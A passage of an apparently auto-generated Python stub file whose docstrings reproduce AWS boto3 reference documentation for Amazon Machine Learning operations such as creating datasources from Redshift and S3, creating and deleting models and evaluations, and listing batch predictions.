``complement`` The complement parameter instructs Amazon ML to use the data that is not included in the range of percentBegin to percentEnd to create a datasource. The complement parameter is useful if you need to create complementary datasources for training and evaluation. To create a complementary datasource, use the same values for percentBegin and percentEnd , along with the complement parameter. For example, the following two datasources do not share any data, and can be used to train and evaluate a model. The first datasource has 25 percent of the data, and the second one has 75 percent of the data. Datasource for evaluation: {'splitting':{'percentBegin':0, 'percentEnd':25}} Datasource for training: {'splitting':{'percentBegin':0, 'percentEnd':25, 'complement':'true'}}
``strategy`` To change how Amazon ML splits the data for a datasource, use the strategy parameter. The default value for the strategy parameter is sequential , meaning that Amazon ML takes all of the data records between the percentBegin and percentEnd parameters for the datasource, in the order that the records appear in the input data. The following two DataRearrangement lines are examples of sequentially ordered training and evaluation datasources: Datasource for evaluation: {'splitting':{'percentBegin':70, 'percentEnd':100, 'strategy':'sequential'}} Datasource for training: {'splitting':{'percentBegin':70, 'percentEnd':100, 'strategy':'sequential', 'complement':'true'}} To randomly split the input data into the proportions indicated by the percentBegin and percentEnd parameters, set the strategy parameter to random and provide a string that is used as the seed value for the random data splitting (for example, you can use the S3 path to your data as the random seed string). If you choose the random split strategy, Amazon ML assigns each row of data a pseudo-random number between 0 and 100, and then selects the rows that have an assigned number between percentBegin and percentEnd . Pseudo-random numbers are assigned using both the input seed string value and the byte offset as a seed, so changing the data results in a different split. Any existing ordering is preserved. The random splitting strategy ensures that variables in the training and evaluation data are distributed similarly. It is useful in the cases where the input data may have an implicit sort order, which would otherwise result in training and evaluation datasources containing non-similar data records. The following two DataRearrangement lines are examples of non-sequentially ordered training and evaluation datasources: Datasource for evaluation: {'splitting':{'percentBegin':70, 'percentEnd':100, 'strategy':'random', 'randomSeed'='s3://my_s3_path/bucket/file.csv'}} Datasource for training: {'splitting':{'percentBegin':70, 'percentEnd':100, 'strategy':'random', 'randomSeed'='s3://my_s3_path/bucket/file.csv', 'complement':'true'}}
DataSchema (string) --A JSON string that represents the schema for an Amazon RDS DataSource . The DataSchema defines the structure of the observation data in the data file(s) referenced in the DataSource .
A DataSchema is not required if you specify a DataSchemaUri
Define your DataSchema as a series of key-value pairs. attributes and excludedVariableNames have an array of key-value pairs for their value. Use the following format to define your DataSchema .
{ 'version': '1.0',
'recordAnnotationFieldName': 'F1',
'recordWeightFieldName': 'F2',
'targetFieldName': 'F3',
'dataFormat': 'CSV',
'dataFileContainsHeader': true,
'attributes': [
{ 'fieldName': 'F1', 'fieldType': 'TEXT' }, { 'fieldName': 'F2', 'fieldType': 'NUMERIC' }, { 'fieldName': 'F3', 'fieldType': 'CATEGORICAL' }, { 'fieldName': 'F4', 'fieldType': 'NUMERIC' }, { 'fieldName': 'F5', 'fieldType': 'CATEGORICAL' }, { 'fieldName': 'F6', 'fieldType': 'TEXT' }, { 'fieldName': 'F7', 'fieldType': 'WEIGHTED_INT_SEQUENCE' }, { 'fieldName': 'F8', 'fieldType': 'WEIGHTED_STRING_SEQUENCE' } ],
'excludedVariableNames': [ 'F6' ] }
DataSchemaUri (string) --The Amazon S3 location of the DataSchema .
ResourceRole (string) -- [REQUIRED]The role (DataPipelineDefaultResourceRole) assumed by an Amazon Elastic Compute Cloud (Amazon EC2) instance to carry out the copy operation from Amazon RDS to an Amazon S3 task. For more information, see Role templates for data pipelines.
ServiceRole (string) -- [REQUIRED]The role (DataPipelineDefaultRole) assumed by AWS Data Pipeline service to monitor the progress of the copy task from Amazon RDS to Amazon S3. For more information, see Role templates for data pipelines.
SubnetId (string) -- [REQUIRED]The subnet ID to be used to access a VPC-based RDS DB instance. This attribute is used by Data Pipeline to carry out the copy task from Amazon RDS to Amazon S3.
SecurityGroupIds (list) -- [REQUIRED]The security group IDs to be used to access a VPC-based RDS DB instance. Ensure that there are appropriate ingress rules set up to allow access to the RDS DB instance. This attribute is used by Data Pipeline to carry out the copy operation from Amazon RDS to an Amazon S3 task.
(string) --
:type RoleARN: string
:param RoleARN: [REQUIRED]
The role that Amazon ML assumes on behalf of the user to create and activate a data pipeline in the user's account and copy data using the SelectSqlQuery query from Amazon RDS to Amazon S3.
:type ComputeStatistics: boolean
:param ComputeStatistics: The compute statistics for a DataSource . The statistics are generated from the observation data referenced by a DataSource . Amazon ML uses the statistics internally during MLModel training. This parameter must be set to true if the ```` DataSource```` needs to be used for MLModel training.
:rtype: dict
:return: {
'DataSourceId': 'string'
}
"""
pass
def create_data_source_from_redshift(DataSourceId=None, DataSourceName=None, DataSpec=None, RoleARN=None, ComputeStatistics=None):
"""
Creates a DataSource from a database hosted on an Amazon Redshift cluster. A DataSource references data that can be used to perform either CreateMLModel , CreateEvaluation , or CreateBatchPrediction operations.
CreateDataSourceFromRedshift is an asynchronous operation. In response to CreateDataSourceFromRedshift , Amazon Machine Learning (Amazon ML) immediately returns and sets the DataSource status to PENDING . After the DataSource is created and ready for use, Amazon ML sets the Status parameter to COMPLETED . DataSource in COMPLETED or PENDING states can be used to perform only CreateMLModel , CreateEvaluation , or CreateBatchPrediction operations.
If Amazon ML can't accept the input source, it sets the Status parameter to FAILED and includes an error message in the Message attribute of the GetDataSource operation response.
The observations should be contained in the database hosted on an Amazon Redshift cluster and should be specified by a SelectSqlQuery query. Amazon ML executes an Unload command in Amazon Redshift to transfer the result set of the SelectSqlQuery query to S3StagingLocation .
After the DataSource has been created, it's ready for use in evaluations and batch predictions. If you plan to use the DataSource to train an MLModel , the DataSource also requires a recipe. A recipe describes how each input variable will be used in training an MLModel . Will the variable be included or excluded from training? Will the variable be manipulated; for example, will it be combined with another variable or will it be split apart into word combinations? The recipe provides answers to these questions.
You can't change an existing datasource, but you can copy and modify the settings from an existing Amazon Redshift datasource to create a new datasource. To do so, call GetDataSource for an existing datasource and copy the values to a CreateDataSource call. Change the settings that you want to change and make sure that all required fields have the appropriate values.
See also: AWS API Documentation
:example: response = client.create_data_source_from_redshift(
DataSourceId='string',
DataSourceName='string',
DataSpec={
'DatabaseInformation': {
'DatabaseName': 'string',
'ClusterIdentifier': 'string'
},
'SelectSqlQuery': 'string',
'DatabaseCredentials': {
'Username': 'string',
'Password': 'string'
},
'S3StagingLocation': 'string',
'DataRearrangement': 'string',
'DataSchema': 'string',
'DataSchemaUri': 'string'
},
RoleARN='string',
ComputeStatistics=True|False
)
:type DataSourceId: string
:param DataSourceId: [REQUIRED]
A user-supplied ID that uniquely identifies the DataSource .
:type DataSourceName: string
:param DataSourceName: A user-supplied name or description of the DataSource .
:type DataSpec: dict
:param DataSpec: [REQUIRED]
The data specification of an Amazon Redshift DataSource :
DatabaseInformation -
DatabaseName - The name of the Amazon Redshift database.
ClusterIdentifier - The unique ID for the Amazon Redshift cluster.
DatabaseCredentials - The AWS Identity and Access Management (IAM) credentials that are used to connect to the Amazon Redshift database.
SelectSqlQuery - The query that is used to retrieve the observation data for the Datasource .
S3StagingLocation - The Amazon Simple Storage Service (Amazon S3) location for staging Amazon Redshift data. The data retrieved from Amazon Redshift using the SelectSqlQuery query is stored in this location.
DataSchemaUri - The Amazon S3 location of the DataSchema .
DataSchema - A JSON string representing the schema. This is not required if DataSchemaUri is specified.
DataRearrangement - A JSON string that represents the splitting and rearrangement requirements for the DataSource . Sample - '{\'splitting\':{\'percentBegin\':10,\'percentEnd\':60}}'
DatabaseInformation (dict) -- [REQUIRED]Describes the DatabaseName and ClusterIdentifier for an Amazon Redshift DataSource .
DatabaseName (string) -- [REQUIRED]The name of a database hosted on an Amazon Redshift cluster.
ClusterIdentifier (string) -- [REQUIRED]The ID of an Amazon Redshift cluster.
SelectSqlQuery (string) -- [REQUIRED]Describes the SQL Query to execute on an Amazon Redshift database for an Amazon Redshift DataSource .
DatabaseCredentials (dict) -- [REQUIRED]Describes AWS Identity and Access Management (IAM) credentials that are used connect to the Amazon Redshift database.
Username (string) -- [REQUIRED]A username to be used by Amazon Machine Learning (Amazon ML)to connect to a database on an Amazon Redshift cluster. The username should have sufficient permissions to execute the RedshiftSelectSqlQuery query. The username should be valid for an Amazon Redshift USER .
Password (string) -- [REQUIRED]A password to be used by Amazon ML to connect to a database on an Amazon Redshift cluster. The password should have sufficient permissions to execute a RedshiftSelectSqlQuery query. The password should be valid for an Amazon Redshift USER .
S3StagingLocation (string) -- [REQUIRED]Describes an Amazon S3 location to store the result set of the SelectSqlQuery query.
DataRearrangement (string) --A JSON string that represents the splitting and rearrangement processing to be applied to a DataSource . If the DataRearrangement parameter is not provided, all of the input data is used to create the Datasource .
There are multiple parameters that control what data is used to create a datasource:
``percentBegin`` Use percentBegin to indicate the beginning of the range of the data used to create the Datasource. If you do not include percentBegin and percentEnd , Amazon ML includes all of the data when creating the datasource.
``percentEnd`` Use percentEnd to indicate the end of the range of the data used to create the Datasource. If you do not include percentBegin and percentEnd , Amazon ML includes all of the data when creating the datasource.
``complement`` The complement parameter instructs Amazon ML to use the data that is not included in the range of percentBegin to percentEnd to create a datasource. The complement parameter is useful if you need to create complementary datasources for training and evaluation. To create a complementary datasource, use the same values for percentBegin and percentEnd , along with the complement parameter. For example, the following two datasources do not share any data, and can be used to train and evaluate a model. The first datasource has 25 percent of the data, and the second one has 75 percent of the data. Datasource for evaluation: {'splitting':{'percentBegin':0, 'percentEnd':25}} Datasource for training: {'splitting':{'percentBegin':0, 'percentEnd':25, 'complement':'true'}}
``strategy`` To change how Amazon ML splits the data for a datasource, use the strategy parameter. The default value for the strategy parameter is sequential , meaning that Amazon ML takes all of the data records between the percentBegin and percentEnd parameters for the datasource, in the order that the records appear in the input data. The following two DataRearrangement lines are examples of sequentially ordered training and evaluation datasources: Datasource for evaluation: {'splitting':{'percentBegin':70, 'percentEnd':100, 'strategy':'sequential'}} Datasource for training: {'splitting':{'percentBegin':70, 'percentEnd':100, 'strategy':'sequential', 'complement':'true'}} To randomly split the input data into the proportions indicated by the percentBegin and percentEnd parameters, set the strategy parameter to random and provide a string that is used as the seed value for the random data splitting (for example, you can use the S3 path to your data as the random seed string). If you choose the random split strategy, Amazon ML assigns each row of data a pseudo-random number between 0 and 100, and then selects the rows that have an assigned number between percentBegin and percentEnd . Pseudo-random numbers are assigned using both the input seed string value and the byte offset as a seed, so changing the data results in a different split. Any existing ordering is preserved. The random splitting strategy ensures that variables in the training and evaluation data are distributed similarly. It is useful in the cases where the input data may have an implicit sort order, which would otherwise result in training and evaluation datasources containing non-similar data records. The following two DataRearrangement lines are examples of non-sequentially ordered training and evaluation datasources: Datasource for evaluation: {'splitting':{'percentBegin':70, 'percentEnd':100, 'strategy':'random', 'randomSeed'='s3://my_s3_path/bucket/file.csv'}} Datasource for training: {'splitting':{'percentBegin':70, 'percentEnd':100, 'strategy':'random', 'randomSeed'='s3://my_s3_path/bucket/file.csv', 'complement':'true'}}
DataSchema (string) --A JSON string that represents the schema for an Amazon Redshift DataSource . The DataSchema defines the structure of the observation data in the data file(s) referenced in the DataSource .
A DataSchema is not required if you specify a DataSchemaUri .
Define your DataSchema as a series of key-value pairs. attributes and excludedVariableNames have an array of key-value pairs for their value. Use the following format to define your DataSchema .
{ 'version': '1.0',
'recordAnnotationFieldName': 'F1',
'recordWeightFieldName': 'F2',
'targetFieldName': 'F3',
'dataFormat': 'CSV',
'dataFileContainsHeader': true,
'attributes': [
{ 'fieldName': 'F1', 'fieldType': 'TEXT' }, { 'fieldName': 'F2', 'fieldType': 'NUMERIC' }, { 'fieldName': 'F3', 'fieldType': 'CATEGORICAL' }, { 'fieldName': 'F4', 'fieldType': 'NUMERIC' }, { 'fieldName': 'F5', 'fieldType': 'CATEGORICAL' }, { 'fieldName': 'F6', 'fieldType': 'TEXT' }, { 'fieldName': 'F7', 'fieldType': 'WEIGHTED_INT_SEQUENCE' }, { 'fieldName': 'F8', 'fieldType': 'WEIGHTED_STRING_SEQUENCE' } ],
'excludedVariableNames': [ 'F6' ] }
DataSchemaUri (string) --Describes the schema location for an Amazon Redshift DataSource .
:type RoleARN: string
:param RoleARN: [REQUIRED]
A fully specified role Amazon Resource Name (ARN). Amazon ML assumes the role on behalf of the user to create the following:
A security group to allow Amazon ML to execute the SelectSqlQuery query on an Amazon Redshift cluster
An Amazon S3 bucket policy to grant Amazon ML read/write permissions on the S3StagingLocation
:type ComputeStatistics: boolean
:param ComputeStatistics: The compute statistics for a DataSource . The statistics are generated from the observation data referenced by a DataSource . Amazon ML uses the statistics internally during MLModel training. This parameter must be set to true if the DataSource needs to be used for MLModel training.
:rtype: dict
:return: {
'DataSourceId': 'string'
}
"""
pass
def create_data_source_from_s3(DataSourceId=None, DataSourceName=None, DataSpec=None, ComputeStatistics=None):
"""
Creates a DataSource object. A DataSource references data that can be used to perform CreateMLModel , CreateEvaluation , or CreateBatchPrediction operations.
CreateDataSourceFromS3 is an asynchronous operation. In response to CreateDataSourceFromS3 , Amazon Machine Learning (Amazon ML) immediately returns and sets the DataSource status to PENDING . After the DataSource has been created and is ready for use, Amazon ML sets the Status parameter to COMPLETED . DataSource in the COMPLETED or PENDING state can be used to perform only CreateMLModel , CreateEvaluation or CreateBatchPrediction operations.
If Amazon ML can't accept the input source, it sets the Status parameter to FAILED and includes an error message in the Message attribute of the GetDataSource operation response.
The observation data used in a DataSource should be ready to use; that is, it should have a consistent structure, and missing data values should be kept to a minimum. The observation data must reside in one or more .csv files in an Amazon Simple Storage Service (Amazon S3) location, along with a schema that describes the data items by name and type. The same schema must be used for all of the data files referenced by the DataSource .
After the DataSource has been created, it's ready to use in evaluations and batch predictions. If you plan to use the DataSource to train an MLModel , the DataSource also needs a recipe. A recipe describes how each input variable will be used in training an MLModel . Will the variable be included or excluded from training? Will the variable be manipulated; for example, will it be combined with another variable or will it be split apart into word combinations? The recipe provides answers to these questions.
See also: AWS API Documentation
:example: response = client.create_data_source_from_s3(
DataSourceId='string',
DataSourceName='string',
DataSpec={
'DataLocationS3': 'string',
'DataRearrangement': 'string',
'DataSchema': 'string',
'DataSchemaLocationS3': 'string'
},
ComputeStatistics=True|False
)
:type DataSourceId: string
:param DataSourceId: [REQUIRED]
A user-supplied identifier that uniquely identifies the DataSource .
:type DataSourceName: string
:param DataSourceName: A user-supplied name or description of the DataSource .
:type DataSpec: dict
:param DataSpec: [REQUIRED]
The data specification of a DataSource :
DataLocationS3 - The Amazon S3 location of the observation data.
DataSchemaLocationS3 - The Amazon S3 location of the DataSchema .
DataSchema - A JSON string representing the schema. This is not required if DataSchemaUri is specified.
DataRearrangement - A JSON string that represents the splitting and rearrangement requirements for the Datasource . Sample - '{\'splitting\':{\'percentBegin\':10,\'percentEnd\':60}}'
DataLocationS3 (string) -- [REQUIRED]The location of the data file(s) used by a DataSource . The URI specifies a data file or an Amazon Simple Storage Service (Amazon S3) directory or bucket containing data files.
DataRearrangement (string) --A JSON string that represents the splitting and rearrangement processing to be applied to a DataSource . If the DataRearrangement parameter is not provided, all of the input data is used to create the Datasource .
There are multiple parameters that control what data is used to create a datasource:
``percentBegin`` Use percentBegin to indicate the beginning of the range of the data used to create the Datasource. If you do not include percentBegin and percentEnd , Amazon ML includes all of the data when creating the datasource.
``percentEnd`` Use percentEnd to indicate the end of the range of the data used to create the Datasource. If you do not include percentBegin and percentEnd , Amazon ML includes all of the data when creating the datasource.
``complement`` The complement parameter instructs Amazon ML to use the data that is not included in the range of percentBegin to percentEnd to create a datasource. The complement parameter is useful if you need to create complementary datasources for training and evaluation. To create a complementary datasource, use the same values for percentBegin and percentEnd , along with the complement parameter. For example, the following two datasources do not share any data, and can be used to train and evaluate a model. The first datasource has 25 percent of the data, and the second one has 75 percent of the data. Datasource for evaluation: {'splitting':{'percentBegin':0, 'percentEnd':25}} Datasource for training: {'splitting':{'percentBegin':0, 'percentEnd':25, 'complement':'true'}}
``strategy`` To change how Amazon ML splits the data for a datasource, use the strategy parameter. The default value for the strategy parameter is sequential , meaning that Amazon ML takes all of the data records between the percentBegin and percentEnd parameters for the datasource, in the order that the records appear in the input data. The following two DataRearrangement lines are examples of sequentially ordered training and evaluation datasources: Datasource for evaluation: {'splitting':{'percentBegin':70, 'percentEnd':100, 'strategy':'sequential'}} Datasource for training: {'splitting':{'percentBegin':70, 'percentEnd':100, 'strategy':'sequential', 'complement':'true'}} To randomly split the input data into the proportions indicated by the percentBegin and percentEnd parameters, set the strategy parameter to random and provide a string that is used as the seed value for the random data splitting (for example, you can use the S3 path to your data as the random seed string). If you choose the random split strategy, Amazon ML assigns each row of data a pseudo-random number between 0 and 100, and then selects the rows that have an assigned number between percentBegin and percentEnd . Pseudo-random numbers are assigned using both the input seed string value and the byte offset as a seed, so changing the data results in a different split. Any existing ordering is preserved. The random splitting strategy ensures that variables in the training and evaluation data are distributed similarly. It is useful in the cases where the input data may have an implicit sort order, which would otherwise result in training and evaluation datasources containing non-similar data records. The following two DataRearrangement lines are examples of non-sequentially ordered training and evaluation datasources: Datasource for evaluation: {'splitting':{'percentBegin':70, 'percentEnd':100, 'strategy':'random', 'randomSeed'='s3://my_s3_path/bucket/file.csv'}} Datasource for training: {'splitting':{'percentBegin':70, 'percentEnd':100, 'strategy':'random', 'randomSeed'='s3://my_s3_path/bucket/file.csv', 'complement':'true'}}
DataSchema (string) --A JSON string that represents the schema for an Amazon S3 DataSource . The DataSchema defines the structure of the observation data in the data file(s) referenced in the DataSource .
You must provide either the DataSchema or the DataSchemaLocationS3 .
Define your DataSchema as a series of key-value pairs. attributes and excludedVariableNames have an array of key-value pairs for their value. Use the following format to define your DataSchema .
{ 'version': '1.0',
'recordAnnotationFieldName': 'F1',
'recordWeightFieldName': 'F2',
'targetFieldName': 'F3',
'dataFormat': 'CSV',
'dataFileContainsHeader': true,
'attributes': [
{ 'fieldName': 'F1', 'fieldType': 'TEXT' }, { 'fieldName': 'F2', 'fieldType': 'NUMERIC' }, { 'fieldName': 'F3', 'fieldType': 'CATEGORICAL' }, { 'fieldName': 'F4', 'fieldType': 'NUMERIC' }, { 'fieldName': 'F5', 'fieldType': 'CATEGORICAL' }, { 'fieldName': 'F6', 'fieldType': 'TEXT' }, { 'fieldName': 'F7', 'fieldType': 'WEIGHTED_INT_SEQUENCE' }, { 'fieldName': 'F8', 'fieldType': 'WEIGHTED_STRING_SEQUENCE' } ],
'excludedVariableNames': [ 'F6' ] }
DataSchemaLocationS3 (string) --Describes the schema location in Amazon S3. You must provide either the DataSchema or the DataSchemaLocationS3 .
:type ComputeStatistics: boolean
:param ComputeStatistics: The compute statistics for a DataSource . The statistics are generated from the observation data referenced by a DataSource . Amazon ML uses the statistics internally during MLModel training. This parameter must be set to true if the ```` DataSource```` needs to be used for MLModel training.
:rtype: dict
:return: {
'DataSourceId': 'string'
}
"""
pass
def create_evaluation(EvaluationId=None, EvaluationName=None, MLModelId=None, EvaluationDataSourceId=None):
"""
Creates a new Evaluation of an MLModel . An MLModel is evaluated on a set of observations associated to a DataSource . Like a DataSource for an MLModel , the DataSource for an Evaluation contains values for the Target Variable . The Evaluation compares the predicted result for each observation to the actual outcome and provides a summary so that you know how effective the MLModel functions on the test data. Evaluation generates a relevant performance metric, such as BinaryAUC, RegressionRMSE or MulticlassAvgFScore based on the corresponding MLModelType : BINARY , REGRESSION or MULTICLASS .
CreateEvaluation is an asynchronous operation. In response to CreateEvaluation , Amazon Machine Learning (Amazon ML) immediately returns and sets the evaluation status to PENDING . After the Evaluation is created and ready for use, Amazon ML sets the status to COMPLETED .
You can use the GetEvaluation operation to check progress of the evaluation during the creation operation.
See also: AWS API Documentation
:example: response = client.create_evaluation(
EvaluationId='string',
EvaluationName='string',
MLModelId='string',
EvaluationDataSourceId='string'
)
:type EvaluationId: string
:param EvaluationId: [REQUIRED]
A user-supplied ID that uniquely identifies the Evaluation .
:type EvaluationName: string
:param EvaluationName: A user-supplied name or description of the Evaluation .
:type MLModelId: string
:param MLModelId: [REQUIRED]
The ID of the MLModel to evaluate.
The schema used in creating the MLModel must match the schema of the DataSource used in the Evaluation .
:type EvaluationDataSourceId: string
:param EvaluationDataSourceId: [REQUIRED]
The ID of the DataSource for the evaluation. The schema of the DataSource must match the schema used to create the MLModel .
:rtype: dict
:return: {
'EvaluationId': 'string'
}
"""
pass
def create_ml_model(MLModelId=None, MLModelName=None, MLModelType=None, Parameters=None, TrainingDataSourceId=None, Recipe=None, RecipeUri=None):
"""
Creates a new MLModel using the DataSource and the recipe as information sources.
An MLModel is nearly immutable. Users can update only the MLModelName and the ScoreThreshold in an MLModel without creating a new MLModel .
CreateMLModel is an asynchronous operation. In response to CreateMLModel , Amazon Machine Learning (Amazon ML) immediately returns and sets the MLModel status to PENDING . After the MLModel has been created and ready is for use, Amazon ML sets the status to COMPLETED .
You can use the GetMLModel operation to check the progress of the MLModel during the creation operation.
See also: AWS API Documentation
:example: response = client.create_ml_model(
MLModelId='string',
MLModelName='string',
MLModelType='REGRESSION'|'BINARY'|'MULTICLASS',
Parameters={
'string': 'string'
},
TrainingDataSourceId='string',
Recipe='string',
RecipeUri='string'
)
:type MLModelId: string
:param MLModelId: [REQUIRED]
A user-supplied ID that uniquely identifies the MLModel .
:type MLModelName: string
:param MLModelName: A user-supplied name or description of the MLModel .
:type MLModelType: string
:param MLModelType: [REQUIRED]
The category of supervised learning that this MLModel will address. Choose from the following types:
Choose REGRESSION if the MLModel will be used to predict a numeric value.
Choose BINARY if the MLModel result has two possible values.
Choose MULTICLASS if the MLModel result has a limited number of values.
For more information, see the Amazon Machine Learning Developer Guide .
:type Parameters: dict
:param Parameters: A list of the training parameters in the MLModel . The list is implemented as a map of key-value pairs.
The following is the current set of training parameters:
sgd.maxMLModelSizeInBytes - The maximum allowed size of the model. Depending on the input data, the size of the model might affect its performance. The value is an integer that ranges from 100000 to 2147483648 . The default value is 33554432 .
sgd.maxPasses - The number of times that the training process traverses the observations to build the MLModel . The value is an integer that ranges from 1 to 10000 . The default value is 10 .
sgd.shuffleType - Whether Amazon ML shuffles the training data. Shuffling the data improves a model's ability to find the optimal solution for a variety of data types. The valid values are auto and none . The default value is none . We strongly recommend that you shuffle your data.
sgd.l1RegularizationAmount - The coefficient regularization L1 norm. It controls overfitting the data by penalizing large coefficients. This tends to drive coefficients to zero, resulting in a sparse feature set. If you use this parameter, start by specifying a small value, such as 1.0E-08 . The value is a double that ranges from 0 to MAX_DOUBLE . The default is to not use L1 normalization. This parameter can't be used when L2 is specified. Use this parameter sparingly.
sgd.l2RegularizationAmount - The coefficient regularization L2 norm. It controls overfitting the data by penalizing large coefficients. This tends to drive coefficients to small, nonzero values. If you use this parameter, start by specifying a small value, such as 1.0E-08 . The value is a double that ranges from 0 to MAX_DOUBLE . The default is to not use L2 normalization. This parameter can't be used when L1 is specified. Use this parameter sparingly.
(string) --String type.
(string) --String type.
:type TrainingDataSourceId: string
:param TrainingDataSourceId: [REQUIRED]
The DataSource that points to the training data.
:type Recipe: string
:param Recipe: The data recipe for creating the MLModel . You must specify either the recipe or its URI. If you don't specify a recipe or its URI, Amazon ML creates a default.
:type RecipeUri: string
:param RecipeUri: The Amazon Simple Storage Service (Amazon S3) location and file name that contains the MLModel recipe. You must specify either the recipe or its URI. If you don't specify a recipe or its URI, Amazon ML creates a default.
:rtype: dict
:return: {
'MLModelId': 'string'
}
"""
pass
def create_realtime_endpoint(MLModelId=None):
"""
Creates a real-time endpoint for the MLModel . The endpoint contains the URI of the MLModel ; that is, the location to send real-time prediction requests for the specified MLModel .
See also: AWS API Documentation
:example: response = client.create_realtime_endpoint(
MLModelId='string'
)
:type MLModelId: string
:param MLModelId: [REQUIRED]
The ID assigned to the MLModel during creation.
:rtype: dict
:return: {
'MLModelId': 'string',
'RealtimeEndpointInfo': {
'PeakRequestsPerSecond': 123,
'CreatedAt': datetime(2015, 1, 1),
'EndpointUrl': 'string',
'EndpointStatus': 'NONE'|'READY'|'UPDATING'|'FAILED'
}
}
"""
pass
def delete_batch_prediction(BatchPredictionId=None):
"""
Assigns the DELETED status to a BatchPrediction , rendering it unusable.
After using the DeleteBatchPrediction operation, you can use the GetBatchPrediction operation to verify that the status of the BatchPrediction changed to DELETED.
Caution: The result of the DeleteBatchPrediction operation is irreversible.
See also: AWS API Documentation
:example: response = client.delete_batch_prediction(
BatchPredictionId='string'
)
:type BatchPredictionId: string
:param BatchPredictionId: [REQUIRED]
A user-supplied ID that uniquely identifies the BatchPrediction .
:rtype: dict
:return: {
'BatchPredictionId': 'string'
}
"""
pass
def delete_data_source(DataSourceId=None):
"""
Assigns the DELETED status to a DataSource , rendering it unusable.
After using the DeleteDataSource operation, you can use the GetDataSource operation to verify that the status of the DataSource changed to DELETED.
Caution: The results of the DeleteDataSource operation are irreversible.
See also: AWS API Documentation
:example: response = client.delete_data_source(
DataSourceId='string'
)
:type DataSourceId: string
:param DataSourceId: [REQUIRED]
A user-supplied ID that uniquely identifies the DataSource .
:rtype: dict
:return: {
'DataSourceId': 'string'
}
"""
pass
def delete_evaluation(EvaluationId=None):
"""
Assigns the DELETED status to an Evaluation , rendering it unusable.
After invoking the DeleteEvaluation operation, you can use the GetEvaluation operation to verify that the status of the Evaluation changed to DELETED .
The results of the DeleteEvaluation operation are irreversible.
See also: AWS API Documentation
:example: response = client.delete_evaluation(
EvaluationId='string'
)
:type EvaluationId: string
:param EvaluationId: [REQUIRED]
A user-supplied ID that uniquely identifies the Evaluation to delete.
:rtype: dict
:return: {
'EvaluationId': 'string'
}
"""
pass
def delete_ml_model(MLModelId=None):
"""
Assigns the DELETED status to an MLModel , rendering it unusable.
After using the DeleteMLModel operation, you can use the GetMLModel operation to verify that the status of the MLModel changed to DELETED.
Caution: The result of the DeleteMLModel operation is irreversible.
See also: AWS API Documentation
:example: response = client.delete_ml_model(
MLModelId='string'
)
:type MLModelId: string
:param MLModelId: [REQUIRED]
A user-supplied ID that uniquely identifies the MLModel .
:rtype: dict
:return: {
'MLModelId': 'string'
}
"""
pass
def delete_realtime_endpoint(MLModelId=None):
"""
Deletes a real time endpoint of an MLModel .
See also: AWS API Documentation
:example: response = client.delete_realtime_endpoint(
MLModelId='string'
)
:type MLModelId: string
:param MLModelId: [REQUIRED]
The ID assigned to the MLModel during creation.
:rtype: dict
:return: {
'MLModelId': 'string',
'RealtimeEndpointInfo': {
'PeakRequestsPerSecond': 123,
'CreatedAt': datetime(2015, 1, 1),
'EndpointUrl': 'string',
'EndpointStatus': 'NONE'|'READY'|'UPDATING'|'FAILED'
}
}
"""
pass
def delete_tags(TagKeys=None, ResourceId=None, ResourceType=None):
"""
Deletes the specified tags associated with an ML object. After this operation is complete, you can't recover deleted tags.
If you specify a tag that doesn't exist, Amazon ML ignores it.
See also: AWS API Documentation
:example: response = client.delete_tags(
TagKeys=[
'string',
],
ResourceId='string',
ResourceType='BatchPrediction'|'DataSource'|'Evaluation'|'MLModel'
)
:type TagKeys: list
:param TagKeys: [REQUIRED]
One or more tags to delete.
(string) --
:type ResourceId: string
:param ResourceId: [REQUIRED]
The ID of the tagged ML object. For example, exampleModelId .
:type ResourceType: string
:param ResourceType: [REQUIRED]
The type of the tagged ML object.
:rtype: dict
:return: {
'ResourceId': 'string',
'ResourceType': 'BatchPrediction'|'DataSource'|'Evaluation'|'MLModel'
}
"""
pass
def describe_batch_predictions(FilterVariable=None, EQ=None, GT=None, LT=None, GE=None, LE=None, NE=None, Prefix=None, SortOrder=None, NextToken=None, Limit=None):
"""
Returns a list of BatchPrediction operations that match the search criteria in the request.
See also: AWS API Documentation
:example: response = client.describe_batch_predictions(
FilterVariable='CreatedAt'|'LastUpdatedAt'|'Status'|'Name'|'IAMUser'|'MLModelId'|'DataSourceId'|'DataURI',
EQ='string',
GT='string',
LT='string',
GE='string',
LE='string',
NE='string',
Prefix='string',
SortOrder='asc'|'dsc',
NextToken='string',
Limit=123
)
:type FilterVariable: string
:param FilterVariable: Use one of the following variables to filter a list of BatchPrediction :
CreatedAt - Sets the search criteria to the BatchPrediction creation date.
Status - Sets the search criteria to the BatchPrediction status.
Name - Sets the search criteria to the contents of the BatchPrediction **** Name .
IAMUser - Sets the search criteria to the user account that invoked the BatchPrediction creation.
MLModelId - Sets the search criteria to the MLModel used in the BatchPrediction .
DataSourceId - Sets the search criteria to the DataSource used in the BatchPrediction .
DataURI - Sets the search criteria to the data file(s) used in the BatchPrediction . The URL can identify either a file or an Amazon Simple Storage Solution (Amazon S3) bucket or directory.
:type EQ: string
:param EQ: The equal to operator. The BatchPrediction results will have FilterVariable values that exactly match the value specified with EQ .
:type GT: string
:param GT: The greater than operator. The BatchPrediction results will have FilterVariable values that are greater than the value specified with GT .
:type LT: string
:param LT: The less than operator. The BatchPrediction results will have FilterVariable values that are less than the value specified with LT .
:type GE: string
:param GE: The greater than or equal to operator. The BatchPrediction results will have FilterVariable values that are greater than or equal to the value specified with GE .
:type LE: string
:param LE: The less than or equal to operator. The BatchPrediction results will have FilterVariable values that are less than or equal to the value specified with LE .
:type NE: string
:param NE: The not equal to operator. The BatchPrediction results will have FilterVariable values not equal to the value specified with NE .
:type Prefix: string
:param Prefix: A string that is found at the beginning of a variable, such as Name or Id .
For example, a Batch Prediction operation could have the Name 2014-09-09-HolidayGiftMailer . To search for this BatchPrediction , select Name for the FilterVariable and any of the following strings for the Prefix :
2014-09
2014-09-09
2014-09-09-Holiday
:type SortOrder: string
:param SortOrder: A two-value parameter that determines the sequence of the resulting list of MLModel s.
asc - Arranges the list in ascending order (A-Z, 0-9).
dsc - Arranges the list in descending order (Z-A, 9-0).
Results are sorted by FilterVariable .
:type NextToken: string
:param NextToken: An ID of the page in the paginated results.
:type Limit: integer
:param Limit: The number of pages of information to include in the result. The range of acceptable values is 1 through 100 . The default value is 100 .
:rtype: dict
:return: {
'Results': [
{
'BatchPredictionId': 'string',
'MLModelId': 'string',
'BatchPredictionDataSourceId': 'string',
'InputDataLocationS3': 'string',
'CreatedByIamUser': 'string',
'CreatedAt': datetime(2015, 1, 1),
